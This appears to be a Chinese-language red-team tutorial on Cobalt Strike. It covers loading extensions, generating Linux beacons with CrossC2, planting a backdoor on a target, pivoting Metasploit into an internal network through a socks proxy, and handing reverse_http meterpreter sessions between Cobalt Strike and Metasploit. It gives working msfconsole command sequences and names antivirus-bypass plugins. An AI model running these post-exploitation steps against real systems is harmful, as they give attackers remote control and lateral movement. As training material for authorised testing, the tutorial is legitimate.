CobaltStrike扩展脚本
扩展是Cobaltstrike一个极为重要的模块,它有效地丰盈了cobaltstrike的功能
选择菜单栏的CobaltStrike–>脚本管理器,点击load,然后选择cna扩展文件即可,旁边的unload为去除该扩展,,reload为重新加载该扩展
常用扩展插件
后渗透插件:梼杌
免杀插件:bypassAV
上线linux主机:CrossC2
CS上线linux主机
Cross C2项目是一个可以生成 Linux/Mac OS 的 CS payload 的跨平台项目
CrossC2安装
下载CrossC2.cna
https://github.com/gloxec/CrossC2/releases/tag/v3.0.2
修改CrossC2-GithubBot-2021-11-02.cna脚本中genCC2路径为真实路径
选择Script Manager,添加CrossC2-GithubBot-2021-11-02.cna (如果成功安装,菜单栏会多出一项CrossC2)
需要在linux/mac上启动客户端
操作过程中要注意如下几点:
1.需要改cna路径
2.要使用 windows/beacon_https/reverse_https 监听器。
3.要把团队服务器下的隐藏文件 .cobaltstrike.beacon_keys 复制到本地 CS 目录下。
4.文件都丢到CS 客户端根目录下,别搞二级目录。
5.生成的 payload 是一个 Linux 下的执行命令payload和可执行文件(/tmp目录下),ip 和端口对应那个windows/beacon_https/reverse_https 监听器。
CrossC2插件生成linux可执行程序
上传后门到靶机,赋予权限并执行上线beacon
CS联动MSF
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。
通过CS内置socks代理将本地MSF带入目标内网执行操作
shell ipconfig发现目标机器存在5网段
思路:利用 beacon shell 在目标机器和团队服务器之间建立 socks , 而后再在本地利用
通过proxychains 之类的工具连到目标内网即可。
通过CS内置socks代理将本地MSF带入目标内网执行操作
查看团队服务器 socks 端口启起来了没有:netstat -tunlp | grep 5454
本地 kali 编辑 /etc/proxychains.conf 文件,挂上团队服务器 ip 和 socks 端口,就可以直接连到目标内网(类型为socks4)可以用 proxychains 之类的工具依次代理,如果想更方便一点,直接把整个 msf 挂到目标内网去让本地 msf 所有模块的流量都从 cs 的 socks 代理走
CS beacon反弹给公网MSF
1.cs上创建一个http的外部监听器
2.msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost (内部ip)
set lport 8023
exploit -j
3.回到 cs 上,在会话处右键,选择 spawn
4.Msf得到meterpreter
MSF meterpreter反弹给CS
1.在cs开启一个监听
2.Msf上执行payload注入模块
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler监听,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost x.x.x.x #cobaltstrike监听的ip
set lport 8003 #cobaltstrike监听的端口
set session 1 #这里是获得的session的id
exploit